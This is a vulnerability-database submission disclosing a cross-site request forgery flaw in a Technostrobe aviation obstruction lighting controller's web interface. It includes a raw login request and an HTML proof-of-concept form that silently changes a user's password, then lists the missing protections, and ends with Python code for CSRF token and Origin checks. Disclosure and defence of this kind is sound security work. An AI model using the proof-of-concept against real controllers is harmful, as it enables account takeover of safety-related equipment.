Submit #783325: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Cross-Site Request Forgery (CSRF)

Title: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Cross-Site Request Forgery (CSRF)
Description: The application does not implement CSRF protection mechanisms for sensitive operations.

Vulnerable Endpoint:
POST /LoginCB HTTP/1.1
Host: <target>
Cookie: session=valid_session

user=user&password=useruser1!

Proof of Concept:
<form method="POST" action="http://technostrobe.shiky.demo:58746/LoginCB">
  <input type="hidden" name="updatePassword" value="0">
  <input type="hidden" name="userId" value="3">
  <input type="hidden" name="newPassword" value="dXNlcnVzZXIxIQ=">
  <input type="submit" value="Submit Request">
</form>

Root Cause:
- No CSRF token validation
- No origin/referrer validation
- Server trusts browser-sent cookies

Impact:
- Account takeover
- Unauthorized configuration changes
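As an added, defender-side illustration that is not part of the submission or of the vendor's firmware: the server-side checks whose absence is listed under Root Cause, a synchronizer token bound to the session plus Origin/Referer validation, written in Python against a hypothetical allowed origin and plain dict stand-ins for the request headers, form fields and session.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origins from which state-changing requests to the controller's web UI are
# accepted. Hypothetical value, constructed for this example.
ALLOWED_ORIGINS = {"https://controller.example"}


def issue_csrf_token(session):
    """Bind a fresh random token to the server-side session (synchronizer token pattern)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers):
    """Accept only requests whose Origin (or, failing that, Referer) is our own origin.

    Fails closed: a request carrying neither header is rejected, as is an
    Origin of "null", which browsers send for some cross-site contexts.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def csrf_token_valid(session, form):
    """The form must echo the token tied to the session; a valid cookie alone proves nothing,
    because the browser attaches cookies to a cross-site form post automatically."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not supplied:
        return False
    # Constant-time comparison so a wrong guess leaks nothing through timing.
    return hmac.compare_digest(expected, supplied)


def accept_state_change(headers, session, form):
    """Gate for sensitive operations such as /LoginCB password changes: both checks must pass."""
    return origin_allowed(headers) and csrf_token_valid(session, form)
```

A cross-site form like the proof of concept above reaches the server with the victim's session cookie but with a foreign Origin and no token, so both checks reject it.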
Source: https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-04-CSRF.md
User: shiky8 (UID 96565)
Submission: 20/03/2026 01h24 (22 days ago)
Moderation: 04/04/2026 16h41 (16 days later)
Status: Accepted
VulDB Entry: 355342 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Cross-Site Request Forgery]
Points: 20
